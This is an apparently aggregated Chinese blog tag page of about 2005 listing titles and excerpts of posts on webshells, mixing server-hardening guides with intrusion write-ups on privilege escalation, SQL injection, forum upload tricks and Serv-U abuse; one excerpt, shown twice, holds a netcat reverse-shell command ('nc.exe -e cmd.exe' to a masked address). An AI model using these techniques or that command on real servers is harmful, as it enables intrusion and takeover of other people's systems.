WebShell

ASP木马Webshell安全解决办案

注意:本文所讲述之设置方法与环境:适用于MicrosoftWindows2000Server/Win2003SERVERIIS5.0/IIS6.0 1、首先我们来看看一般ASP木马、Webshell所利用的
loveme23·2005-11-18 08:00

Windows下权限设置详解(copy)

2005-02-15 文章属性:原创 文章提交: mrcool (mrcoolfuyu_at_tom.com) 随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL
wapysun·2005-11-10 14:00

ASP木马Webshell安全解决办案

本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER   IIS5.0/IIS6.0      1、首先我们来看看一般ASP木马、Webshell
baiseda·2005-10-13 10:00

用GOOGLE你瞬间成为黑客

google hacking其实并算不上什么新东西,当时并没有重视这种 技术,认为webshell什么的,并无太大实际用途.google hacking其实并非 如此简单...
·2005-08-26 10:00

解除TCP/IP限制的小技巧

1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行:x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port
·2005-08-26 09:00

WEBSHELL权限提升技巧(综合版)

c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下
baiseda·2005-08-19 11:00

Windows下权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
ccna30·2005-08-19 10:00

Windows下权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
ccna30·2005-08-19 10:00

用GOOGLE你瞬间成为黑客

:googlehacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.googlehacking其实并非如此简单...googlehacking的简单实现使用
Treacle·2005-08-05 14:00

防范WEB SHELL(整理文)

现在通过整理一些高手的文章来说说如何防范WEBSHELL。常见的WEBSHELL也就是ASP,PHP,PERL,这些脚本写成的。
wapysun·2005-06-27 17:00

征服你的Web Shell

作者:冷颜  QQ:329537   郁闷的通宵,无意在xiaolu群里看到某人放出了某个安全站点的WebShell地址,当然,和以往一样,能看到的只是别人给出的后门,没人会这么轻易就给密码你玩上一份.
loveme23·2005-05-14 08:00

突破SQL错误提示上传webshell

作者:疯狗 http://www.cnbct.org/ 得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.联想到一个权限不是很高的命令
baiseda·2005-05-12 07:00

突破SQL错误提示上传webshell

作者:疯狗http://www.cnbct.org/得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.联想到一个权限不是很高的命令
iteye_2449·2005-05-12 07:00

phpshell木马内容

PHPWebShellA{TEXT-DECORATION:none;}A:hover{COLOR:#0099FF;}A:link{color:#205064;}A:visited{color:#006699
loveme23·2005-05-09 11:00

[转载]解除TCP/IP限制的小技巧

作者:河马史诗1.用NC反弹得到一个shell本机监听NC-l-p32WEBSHELL运行:x:\xxx\serv-u.exe"x:\xxx\nc.exe-ecmd.exe*.*.*.
loveme23·2005-05-08 22:00

如何更简单的留你的webshell后门

得到网站的webshell后,如果被管理员发现,那么你的马就没用了,被删了!
loveme23·2005-04-29 08:00

今天心情不错!

主机没办法进去,我就换个入侵的思路,还是从我原来的webshell下手,找到我学校网站的文件夹,再仔细看看里面的东西,只
loveme23·2005-04-18 12:00

艰难的入侵!

要是得到webshell,那就不等于130多个站的命运就掌握在我手里了吗!哈哈~看看有没有上传的页面。我扫啊扫
loveme23·2005-04-15 23:00

关于WEBSHELL中的命令提示符没有权限提升

有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站长助手6.0刚出来
baiseda·2005-04-14 19:00

劫持数据库,实现跨站攻击

这种攻击方法与得到webshell后插入木马代码要实现起来要简单容易的多,当然这种方法也有它的缺点,这个我们一会讨论。先说实现跨站攻击的前提条件,当然是网页中要存在输入信息
wapysun·2005-04-14 15:00

劫持数据库,实现跨站攻击

这种攻击方法与得到webshell后插入木马代码要实现起来要简单容易的多,当然这种方法也有它的缺点,这个我们一会讨论。先说实现跨站攻击的前提条件,当然是网页中要存在输入信息
JAVA海洋·2005-04-14 15:00

关于webshell中的cmd的权限提升

有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站长助手6.0刚出来
loveme23·2005-04-12 07:00

对Serv-U 6.0.0.2默认帐户及密码的一点理解

今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini[GLOBAL]Version=6.0.0.2OpenFilesDownloadMode=ExclusivePacketTimeOut
loveme23·2005-04-11 21:00

关于BBSxp/LeadBBS的后台上传Webshell的鸡肋防范

近弄了两个BBS系统,发现后台传/改Webshell的时候都做了一定限度的防范,使得很多新手不知道如何去传Webshell控制主机.其实这个问题很简单......几分钟就能解决1.BBSXP昨天朋友弄进去一个
loveme23·2005-04-11 21:00

劫持数据库,实现跨站攻击!!!

这种攻击方法与得到webshell后插入木马代码要实现起来要简单容易的多,当然这种方法也有它的缺点,这个我们一会讨论。先说实现跨站攻击的前提条件,当然是网页中要存在输入信息
baiseda·2005-04-11 20:00

GIF89a结合动网后台(7.1以前)取得webshell的完整解释

文章编辑:NetHacking 来源: http://www.powers.com.cn 作者:喜欢忧伤 背景: (1)动网上传文件,备份得到后门 (2)使用GIF89a可以上传内容为木马的gif图片:逃过头像上传的检测。 所以产生了新的方法:上传gif头像图片,备份得到木马了。(使用范围为:动网7.1以前的版本) 但是很多人在执行后门后出现的是一张不能显示的图片.
baiseda·2005-04-11 19:00

动网后台也可以这样玩

www.wrsky.com 偶以前遇到过这样的论坛,只完成了前面的操作可是后面就是一个x不知道怎么办啦,还是九小这小子聪明,哈哈) 今天下午powers群有个伙计给了偶个动网论坛的后台权限,问偶能否拿个webshell
baiseda·2005-04-09 21:00

检测某账户对默认权限目录是否可写的脚本

检测某账户对默认权限目录是否可写的脚本 文章作者:无敌最寂寞[E.S.T]在web入侵后,经常会寻找一个可写目录上传webshell或者其它东西,这是一个关键的问题.大部分管理员对一些系统目录做了权限的更改设置
baiseda·2005-04-06 18:00

webshell下的一次得到终端账号和密码的尝试

文章作者:LvHuaNa[F.S.T] 文章来源:http://lvhuana.blogchina.com/ 发布时间:2005-04-01 10:40:13 今天老婆相中了一个音乐网站,里面有很多混音,可能听上去很棒吧,谁知道呢,俺又不喜欢那些东东。由于我整天吹牛说我黑过一些站点,老婆非要我把那些混音搞下来,没办法了,为了婚姻幸福,为了我的后半生的衣服有人洗,饭有人做,我就上去看看了。。
baiseda·2005-04-02 08:00

如何利用VNC服务提升权限

如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行了VNC服务,就可以考虑用下面的方法。 默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。
baiseda·2005-03-23 20:00

Google Hacking 的实现以及应用

前言googlehacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的
loveme23·2005-03-19 15:00

上传ASP马后权限提升

本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1:C:\DocumentsandSettings\AllUsers
baiseda·2005-03-19 13:00

从上传webshell到突破TCP/IP筛选到3389终端登陆

LvHuaNa 一:得到webshell 今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........
baiseda·2005-03-19 13:00

Windows下权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。
izuoyan·2005-03-15 08:00

简单突破权限设置漏洞挂马

拿一个例子吧 ,比如asp注入,动网,动感,动易,尘缘等等漏洞,好多的,反正不管怎样我们现在有个shell 当我们取得一个webshell时候,主要要做的就是看看有什末权限,来提升权限,有权限才能知道个个盘
baiseda·2005-03-13 18:00

Windows下权限设置详解

要打造一台安全的WEB服务器,那么这台服务器就一定要使用NTFS和Windows NT/2000/2003……   随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL
happmaoo·2005-03-12 03:00

WebShell处理

转自来源:http://fox.he100.com/做了1年时间的虚拟主机管理员,大概对NT下的WEBSHELL的防范也有一定的了解。现在通过整理一些高手的文章来说说如何防范WEBSHELL
stefli·2005-03-10 18:00

google hacking的实现以及应用

的实现以及应用(上) 前言   googlehacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell
linkboy·2005-03-02 15:00

google hacking的实现以及应用

的实现以及应用(上) 前言   googlehacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell
linkboy·2005-03-02 15:00

对Serv-U 6.0.0.2默认帐户及密码的一点理解

创建时间:2005-02-22文章属性:原创文章提交:小齐今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini[GLOBAL]Version=6.0.0.2OpenFilesDownloadMode
psyl·2005-02-25 12:00

对Serv-U 6.0.0.2默认帐户及密码的一点理解

创建时间:2005-02-22文章属性:原创文章提交:小齐 今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini[GLOBAL]Version=6.0.0.2OpenFilesDownloadMode
baiseda·2005-02-25 12:00

传说中添加超级用户的asp代码分析

作者也说了,“反正代码是对的,但是很少能成功,具体的看运气了”,偶也拿来在webshell上试了试,失败了。把容错语句去掉,看到错误原因是“权限不够”。
psyl·2005-02-24 14:00

传说中添加超级用户的asp代码分析

作者也说了,“反正代码是对的,但是很少能成功,具体的看运气了”,偶也拿来在webshell上试了试,失败了。把容错语句去掉,看到错误原因是“权限不够”。
baiseda·2005-02-24 14:00

(转载)Windows下权限设置详解

下权限设置详解创建时间:2005-02-15文章属性:原创文章提交:mrcool(mrcoolfuyu_at_tom.com)随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL
Kendiv·2005-02-24 02:00

sql injection终极利用方法

此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢把话说满,呵呵,经本人数百次真实
baiseda·2005-02-19 13:00

[Windows安全设置]Windows下权限设置详解

创建时间:2005-02-15 文章提交: mrcool (mrcoolfuyu_at_tom.com) 随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL
wapysun·2005-02-18 10:00

动网论坛7.0获得WebShell的分析

这篇文章,就和我说,按照这个文章的方法,有没有办法拿到动网论坛上利用,因为DVBBS7.0即使设置允许上传asp文件,实际上也是无法上传的,既然能够去后台设置允许上传文件类型,那何不利用这个方法去备份一个WebShell
baiseda·2005-02-17 00:00

使用Magic Winmail 来提升权限

但是在笔者最近的一次渗透中发现,装有改软件的服务器,如果一旦被入侵者得到webshell就可以通过这个软件来提升权限,非常危险。
baiseda·2005-02-15 21:00

设置NTFS权限以避免通过webshell遍历主机目录(原创)

关于如何通过动网得到webshell,请参阅我转的一篇文章《动网论坛7.0获得WebShell的分析(转)》http://blog.csdn.net/starlee1738/archive/2005/01
izuoyan·2005-01-28 11:00

动网论坛7.0获得WebShell的分析

这篇文章,就和我说,按照这个文章的方法,有没有办法拿到动网论坛上利用,因为DVBBS7.0即使设置允许上传asp文件,实际上也是无法上传的,既然能够去后台设置允许上传文件类型,那何不利用这个方法去备份一个WebShell
izuoyan·2005-01-15 21:00
上一页 59 60 61 62 63 64 65 66 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他